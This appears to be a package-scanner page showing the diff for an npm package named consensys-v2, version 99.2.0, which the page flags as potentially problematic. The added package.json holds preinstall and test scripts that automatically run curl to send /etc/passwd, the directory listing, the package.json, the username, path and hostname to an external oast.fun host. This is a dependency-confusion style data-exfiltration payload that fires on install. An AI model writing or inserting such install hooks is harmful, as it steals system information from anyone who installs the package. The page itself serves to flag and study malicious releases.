consensys-v2 99.2.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of consensys-v2 might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +12 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "consensys-v2",
3
+ "version": "99.2.0",
4
+ "description": "testing",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "/usr/bin/curl --data '@/etc/passwd' --data-urlencode \"ls=$(ls)\" --data-urlencode \"packagejson=$(cat package.json)\" \"https://ce1nbsf2vtc00002tsy0g8y4ihhyyyyyb.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
8
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' --data-urlencode \"ls=$(ls)\" --data-urlencode \"packagejson=$(cat package.json)\" \"https://ce1nbsf2vtc00002tsy0g8y4ihhyyyyyb.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
9
+ },
10
+ "author": "swdb",
11
+ "license": "ISC"
12
+ }